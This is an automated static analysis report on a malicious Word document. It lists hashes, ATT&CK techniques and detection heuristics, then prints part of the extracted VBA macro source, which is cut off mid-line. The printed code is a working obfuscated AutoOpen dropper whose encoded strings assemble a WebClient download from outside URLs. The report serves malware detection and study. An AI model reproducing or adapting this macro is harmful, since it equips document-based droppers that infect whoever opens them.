Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb1fcaf0b421a08a…

MALICIOUS

Office (OLE)

Size: 215.5 KB
Created: 2017-12-21 19:38:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: accf5968966fa14c00aedff6791e9c14
SHA-1: 688db56dda3e2fad6b1123b472b006f6c0deccc3
SHA-256: bb1fcaf0b421a08a89115dfd22fe6b33568f35c35025411adbb7ca5d3999de2e
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a known indicator of malicious documents. The macro calls the Shell() function (a critical-severity heuristic) to execute arbitrary commands. This strongly suggests the document is designed to download and execute a second-stage payload, as is typical of macro-based malware droppers.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81330 bytes
SHA-256: 4b7a2db9a7c52f57b02a99ddaabcefb45fad4c2e509a6500223376be95246e74
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zhqMKzRiBq"
Sub AutoOpen()
On Error Resume Next
iHFmQqiOY = 871 / Rnd(4) + lfVMMbWdIhWEz + bcKPucPKfYwKV * 9 + Int(krXkMfiwlCAKu * CStr(qdQiKNKnfSU)) + abAzPBGdtRJlrR * CDate(3624 - 352183467 * 84 / 475) / irIPjhnT - CSng(620)
CISzIhwMF = 871 / Rnd(4) + QEGwnmwEQ + ZTimtEfwXDkO * 9 + Int(IzpzCwvwFEVaM * CStr(iDVQfRD)) + idfGDBAoBfCQww * CDate(3624 - 352183467 * 84 / 475) / pwGVmUOJLjCzsB - CSng(620)
mFzkOPMRv = 871 / Rnd(4) + twQDpYvDkGfTYv + ZUUUaAEHn * 9 + Int(aFjkjlYAL * CStr(qELTnkzMmVS)) + BTovrzVtood * CDate(3624 - 352183467 * 84 / 475) / OSPSBUHTNUaVI - CSng(620)
AjpBrVRwu = 871 / Rnd(4) + MwntafS + BaXEVVjLROzT * 9 + Int(tSmrQjszTMsU * CStr(CWNbhovhY)) + lvLUUjDDwbXSdB * CDate(3624 - 352183467 * 84 / 475) / KwZpiOf - CSng(620)
kHSKzqjLY = 871 / Rnd(4) + VXBvFLXQPJvtqj + MYWpVsqfFLDBJ * 9 + Int(NWlDYzFzGEmB * CStr(SFjqRiSlRK)) + CGisvjBKOi * CDate(3624 - 352183467 * 84 / 475) / mKqRmmM - CSng(620)
Application.Run "bMlcDLi", pGJOHTiVjj
SSCTTYaVU = 871 / Rnd(4) + TrwvMPARSNDW + cnqQSZA * 9 + Int(wfYzrTjnGRaOPq * CStr(lGavpATYJv)) + ZfcIHwUmX * CDate(3624 - 352183467 * 84 / 475) / XwUvQdMv - CSng(620)
dHnlQFJrd = 871 / Rnd(4) + zcGPEcuD + wKducTLN * 9 + Int(GAZWHdfn * CStr(nPWwPSKnuEI)) + rBNSNlANLSEsw * CDate(3624 - 352183467 * 84 / 475) / dlcUdkRBGnoz - CSng(620)
vKkoYGFTP = 871 / Rnd(4) + LDtrfZPVKizipY + abYapuZi * 9 + Int(ppdXtwnfV * CStr(ZYalErmldJz)) + VLcwfhsaE * CDate(3624 - 352183467 * 84 / 475) / ZfCqwsbMrTJL - CSng(620)
wmzpTjCJw = 871 / Rnd(4) + OYURuvSGnu + owvjOuuJQS * 9 + Int(HKMpwqNJXvo * CStr(RdVfzjt)) + jOlKoEFFoIAj * CDate(3624 - 352183467 * 84 / 475) / iRKEEwc - CSng(620)
sdWiztdGs = 871 / Rnd(4) + wcWhzsYCB + kIVOvIDjLLatkR * 9 + Int(DsGKuazMZMXJT * CStr(YlBCBrkIIjrq)) + uhoCrEpwASrHTl * CDate(3624 - 352183467 * 84 / 475) / wBXwjAnZYqjaIu - CSng(620)
End Sub
Function pGJOHTiVjj()
On Error Resume Next
LQLSUjFwoSj = 871 / Rnd(4) + SvWChXkHmPT + apFzKtr * 9 + Int(IXIQDhIKhtzl * CStr(spVlzWSIHoSCVr)) + EhwWXVUvn * CDate(3624 - 352183467 * 84 / 475) / wzPZZsP - CSng(620)
tSbOis = 871 / Rnd(4) + flazjNOpc + ChoTOziAQ * 9 + Int(IdhkGVmjTFww * CStr(HMzidXwqma)) + MVOAQACVIQICDq * CDate(3624 - 352183467 * 84 / 475) / OaiVXSEKjGQOF - CSng(620)
HKonQmVdqjS = Mid("iq+ogq-oogq+ogqbogq+ogqject ran'+'AdR+AdRdom;tFbogq+AdR+AdRogqbcd ogq'+'+ogq= Cgjogq+ogqhttp:ogqAdR+A'+'dR+ogq//www.ogq+AdR+AdRogq5tLPuonkki", 2, 129)
iQcNrRf = 871 / Rnd(4) + EiAkNKXZbAip + iptGzwdOb * 9 + Int(uhjBWDjhvC * CStr(QJOUUlzwuU)) + zqQKVTavm * CDate(3624 - 352183467 * 84 / 475) / dLFChJAVs - CSng(620)
ozdXsEG = 871 / Rnd(4) + pkzvEJnZqomFS + SMEBdORHRsAkFw * 9 + Int(zXQsptmVwiVAFK * CStr(nmVoZVHNd)) + YhTGvTErfqQV * CDate(3624 - 352183467 * 84 / 475) / cBjrHWHOM - CSng(620)
vCdmACnau = 871 / Rnd(4) + mntSjfliL + QhChkplMhPH * 9 + Int(PCmzIRncwcCBaK * CStr(zdphvkICwIYSsY)) + ocLmXrfiXUrjf * CDate(3624 - 352183467 * 84 / 475) / fBGasnisiLPGz - CSng(620)
zZImJOhFjSi = Mid("uPowwjDizJNOsk7twpacQZ3ZCDDogq_.ogq+ogqExceogq+ogqpogq+ogqtioogq+'+'ogqn.Me'+'sogq+ogqsog'+'AdR+AdRq+ogqaogq+NVuhXSkRl", 28, 82)
DSnkAZQi = 871 / Rnd(4) + wENPRWYsJnHQMT + BLRIZUBSZ * 9 + Int(mtdzrWWMkUChD * CStr(UGzHiFMpMdFK)) + GmcwmnXidutRR * CDate(3624 - 352183467 * 84 / 475) / DbwMTIfnTXuj - CSng(620)
YAtAwD = 871 / Rnd(4) + EVMaoauR + EfwjvnU * 9 + Int(ZnWLmzjT * CStr(wiJrHPYVOE)) + zowBpNAnBqoi * CDate(3624 - 352183467 * 84 / 475) / vEiavRYdG - CSng(620)
GIuEkVfD = 871 / Rnd(4) + fzjAtjjPaI + PtfHrLEpQU * 9 + Int(NOQmCKST * CStr(CCTrjzu)) + llVcSawZcXwHSE * CDate(3624 - 352183467 * 84 / 475) / zWkSkHiVw - CSng(620)
LNIvfVoIZ = Mid("rjbmY64'ooAdR+AdRgq+oAdR+AdRg'+'qmogq+ogq/Stogq+ogq6ogq+ogq5fdogq+o'+'gqfogq+ogqTogq+ogqG,httogq+ogqp:ogq+ogq//www.cenogq+ogAdR+AdRqtauAdR+'+'AdR'+'rogq+AdR+AdRzN8i6i179L54US7noj", 8, 153)
cvpHb = 871 / Rnd
... (truncated)